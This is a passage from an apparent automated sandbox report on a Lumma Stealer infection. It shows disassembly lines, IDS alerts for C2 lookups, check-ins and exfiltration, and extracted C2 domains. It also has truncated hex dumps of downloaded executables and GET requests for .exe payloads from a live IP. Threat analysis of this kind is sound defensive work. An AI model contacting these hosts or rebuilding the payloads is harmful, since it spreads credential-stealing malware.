              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax+36A27D27h] | 7_2_0042C6D7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [esi], al | 7_2_0042C6D7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+07540F19h] | 7_2_0042C6D7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+07540F19h] | 7_2_0042C6D7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [eax], dx | 7_2_00417E82
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp dword ptr [edi+ebp*8], 299A4ECDh | 7_2_0043E690
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah] | 7_2_0042BFD3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah] | 7_2_0042BFDA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 7_2_0042A060
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh] | 7_2_00425F7D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov edx, ecx | 7_2_0041D074
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov edx, ecx | 7_2_0041D087
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [esi], cl | 7_2_0042D085
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [esi], cl | 7_2_0042D085
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh] | 7_2_0041597D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh] | 7_2_00416E97
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov edi, eax | 7_2_00416E97
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ebx, eax | 7_2_00405910
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ebp, eax | 7_2_00405910
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h | 7_2_00425920
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [eax], cx | 7_2_004286F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh] | 7_2_00417190
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ecx, eax | 7_2_00422270
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [edi+ebx], 00000000h | 7_2_0040C274
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [00444284h] | 7_2_00425230
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [ebp-10h] | 7_2_0043CAC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+1Ch] | 7_2_004292D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov edx, ebx | 7_2_004292D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then add ebp, dword ptr [esp+0Ch] | 7_2_0042AAD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [eax], cl | 7_2_00415ADC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx ebx, bx | 7_2_0042536C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx ebx, byte ptr [ecx+esi] | 7_2_00402B70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [ecx], dx | 7_2_00427307
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx ebp, word ptr [ecx+ebx*2] | 7_2_00436B20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [ebp-10h] | 7_2_0043CBD6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] | 7_2_00407470
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] | 7_2_00407470
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp eax | 7_2_0042B475
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h | 7_2_00419C10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [ebp-10h] | 7_2_0043CCE0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [ebx], al | 7_2_0042B4BB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [ebp-10h] | 7_2_0043CD60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 7_2_004345F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+2Ch] | 7_2_00427653
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [ebp-10h] | 7_2_0043CE00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h | 7_2_0042A630
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx-41h] | 7_2_004296D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx edi, byte ptr [esi+ecx-000000BCh] | 7_2_00415EE0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [eax], cx | 7_2_00421EE0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp al, 2Eh | 7_2_004266E7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [eax], cx | 7_2_004286F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh] | 7_2_00416E97
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov edi, eax | 7_2_00416E97
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp word ptr [ebp+edx+02h], 0000h | 7_2_0041CEA5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then add ebx, 03h | 7_2_00428F5D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh] | 7_2_00425F7D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp dword ptr [ecx+edx*8], B430E561h | 7_2_00414F08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ecx, edx | 7_2_00414F08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [eax], cx | 7_2_00420717
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [ecx], dx | 7_2_00420717
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp dword ptr [edx+ecx*8], 2298EE00h | 7_2_0043DFB0

              Networking

              Source: Network traffic | Suricata IDS: 2057926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.4:49738 -> 172.67.206.64:443
              Source: Network traffic | Suricata IDS: 2057949 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz) : 192.168.2.4:54123 -> 1.1.1.1:53
              Source: Network traffic | Suricata IDS: 2057981 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz) : 192.168.2.4:54123 -> 1.1.1.1:53
              Source: Network traffic | Suricata IDS: 2057926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.4:49739 -> 172.67.206.64:443
              Source: Network traffic | Suricata IDS: 2057926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.4:49746 -> 172.67.206.64:443
              Source: Network traffic | Suricata IDS: 2057945 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) : 192.168.2.4:65361 -> 1.1.1.1:53
              Source: Network traffic | Suricata IDS: 2057983 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) : 192.168.2.4:65361 -> 1.1.1.1:53
              Source: Network traffic | Suricata IDS: 2057926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.4:49737 -> 172.67.206.64:443
              Source: Network traffic | Suricata IDS: 2057974 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.4:49746 -> 172.67.206.64:443
              Source: Network traffic | Suricata IDS: 2057931 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz) : 192.168.2.4:60620 -> 1.1.1.1:53
              Source: Network traffic | Suricata IDS: 2057977 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz) : 192.168.2.4:60620 -> 1.1.1.1:53
              Source: Network traffic | Suricata IDS: 2057926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.4:49748 -> 172.67.206.64:443
              Source: Network traffic | Suricata IDS: 2057974 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.4:49739 -> 172.67.206.64:443
              Source: Network traffic | Suricata IDS: 2057974 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.4:49738 -> 172.67.206.64:443
              Source: Network traffic | Suricata IDS: 2057974 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.4:49748 -> 172.67.206.64:443
              Source: Network traffic | Suricata IDS: 2057925 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz) : 192.168.2.4:58954 -> 1.1.1.1:53
              Source: Network traffic | Suricata IDS: 2057973 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz) : 192.168.2.4:58954 -> 1.1.1.1:53
              Source: Network traffic | Suricata IDS: 2057974 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.4:49737 -> 172.67.206.64:443
              Source: Network traffic | Suricata IDS: 2057926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.4:49750 -> 172.67.206.64:443
              Source: Network traffic | Suricata IDS: 2057974 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.4:49750 -> 172.67.206.64:443
              Source: Network traffic | Suricata IDS: 2057926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.4:49742 -> 172.67.206.64:443
              Source: Network traffic | Suricata IDS: 2057974 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.4:49742 -> 172.67.206.64:443
              Source: Network traffic | Suricata IDS: 2057926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.4:49740 -> 172.67.206.64:443
              Source: Network traffic | Suricata IDS: 2057974 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.4:49740 -> 172.67.206.64:443
              Source: Network traffic | Suricata IDS: 2057929 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz) : 192.168.2.4:58836 -> 1.1.1.1:53
              Source: Network traffic | Suricata IDS: 2057979 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz) : 192.168.2.4:58836 -> 1.1.1.1:53
              Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49737 -> 172.67.206.64:443
              Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49750 -> 172.67.206.64:443
              Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49739 -> 172.67.206.64:443
              Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 172.67.206.64:443
              Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49738 -> 172.67.206.64:443
              Source: Network traffic | Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49748 -> 172.67.206.64:443
              Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 172.67.206.64:443
              Source: Malware configuration extractor | URLs: dare-curbys.biz
              Source: Malware configuration extractor | URLs: zinc-sneark.biz
              Source: Malware configuration extractor | URLs: dwell-exclaim.biz
              Source: Malware configuration extractor | URLs: se-blurry.biz
              Source: Malware configuration extractor | URLs: print-vexer.biz
              Source: Malware configuration extractor | URLs: covery-mover.biz
              Source: Malware configuration extractor | URLs: formy-spill.biz
              Source: Malware configuration extractor | URLs: impend-differ.biz
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 06:52:07 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Tue, 10 Dec 2024 18:23:51 GMTETag: "b200-628ee95401970"Accept-Ranges: bytesContent-Length: 45568Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f2 35 5c c4 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 a4 00 00 00 0c 00 00 00 00 00 00 ee c3 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 9c c3 00 00 4f 00 00 00 00 e0 00 00 18 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 80 c3 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 a3 00 00 00 20 00 00 00 a4 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 18 08 00 00 00 e0 00 00 00 0a 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 01 00 00 02 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 c3 00 00 00 00 00 00 48 00 00 00 02 00 05 00 98 22 00 00 e8 a0 00 00 03 00 02 00 07 00 00 06 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 53 00 00 00 01 00 00 11 28 0f 00 00 0a 72 01 00 00 70 28 10 00 00 0a 6f 11 00 00 0a 0a 28 0f 00 00 0a 72 33 00 00 70 28 10 00 00 0a 6f 11 00 00 0a 0b 73 12 00 00 0a 25 6f 13 00 00 0a 06 07 6f 14 00 00 0a 7e 01 00 00 04 6f 15 00 00 0a 0c 7e 02 00 00 04 08 28 03 00 00 06 2a 1e 02 28 16 00 00 0a 2a 00 13 30 06 00 df 00 00 00 02 00 00 11 28 0f 00 00 0a 72 0e 01 00 70 28 10 00 00 0a 6f 11 00 00 0a 28 10 00 00 0a 7e 03 00 00 04 28 05 00 00 06 0a 28 0f 00 00 0a 06 6f 11 00 00 0a 0b 73 17 00 00 0a 73 18 00 00 0a 0c 08 6f 19 00 00 0a 28 0f 00 00 0a 72 0b 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1a 00 00 0a 26 08 6f 19 00 00 0a 28 0f 00 00 0a 72 2d 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1a 00 00 0a 26 08 17 6f 1b 00 00 0a 08 17 8d 19 00 00 01 25 16 07 a2 6f 1c 00 00 0a 6f 1d 00 00 0a 28 0f 00 00 0a 72 57 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1e 00 00 0a 28 0f 00 00 0a 72 71 94 00 70 28 1
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 06:52:08 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Tue, 10 Dec 2024 18:22:16 GMTETag: "48e00-628ee8f9c1375"Accept-Ranges: bytesContent-Length: 298496Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 05 00 ea b9 55 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 dc 03 00 00 ae 00 00 00 00 00 00 f0 87 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e1 0b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 05 00 78 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c 0d 04 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 da 03 00 00 10 00 00 00 dc 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bb 20 00 00 00 f0 03 00 00 22 00 00 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c f6 00 00 00 20 04 00 00 50 00 00 00 02 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 04 00 00 00 00 20 05 00 00 02 00 00 00 52 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 78 39 00 00 00 30 05 00 00 3a 00 00 00 54 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 
00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 06:52:08 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Tue, 10 Dec 2024 18:22:16 GMTETag: "48e00-628ee8f9c1375"Accept-Ranges: bytesContent-Length: 298496Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 05 00 ea b9 55 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 dc 03 00 00 ae 00 00 00 00 00 00 f0 87 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e1 0b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 05 00 78 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c 0d 04 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 da 03 00 00 10 00 00 00 dc 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bb 20 00 00 00 f0 03 00 00 22 00 00 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c f6 00 00 00 20 04 00 00 50 00 00 00 02 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 04 00 00 00 00 20 05 00 00 02 00 00 00 52 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 78 39 00 00 00 30 05 00 00 3a 00 00 00 54 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 
00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: global traffic | HTTP traffic detected: GET /infopage/bhg8.exe HTTP/1.1 | X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq | Host: 147.45.44.131 | Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET /infopage/ung0.exe HTTP/1.1 | X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq | Host: 147.45.44.131
              Source: Joe Sandbox View | IP Address: 147.45.44.131
              Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
              Source: Joe Sandbox View | ASN Name: RACKMARKTES
              Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
